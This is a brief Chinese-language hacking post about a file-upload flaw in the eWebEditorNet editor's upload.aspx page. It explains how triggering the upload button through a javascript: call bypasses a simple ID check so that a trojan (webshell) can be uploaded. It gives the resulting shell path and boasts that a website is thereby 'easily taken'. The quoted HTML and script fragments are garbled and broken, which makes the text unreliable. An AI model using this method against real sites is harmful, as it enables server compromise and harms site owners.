eWebEditorNet 主要是一个upload.aspx文件

eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。 原理： 代码 <form id="post" encType="server">     "uploadfile" style="file" size="uploadfile" runat= "lbtnUpload" runat= "JavaScript"> 只是简单的对ID进行验证 只要构造javascript:lbtnUpload.click();满足条件 达到上传木马的效果 成功以后查看源代码 代码 a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>   木马的具体地址为 /eWebEditorNet/UploadFile/200801141044412198.cer  这样就轻松的拿下了一个网站。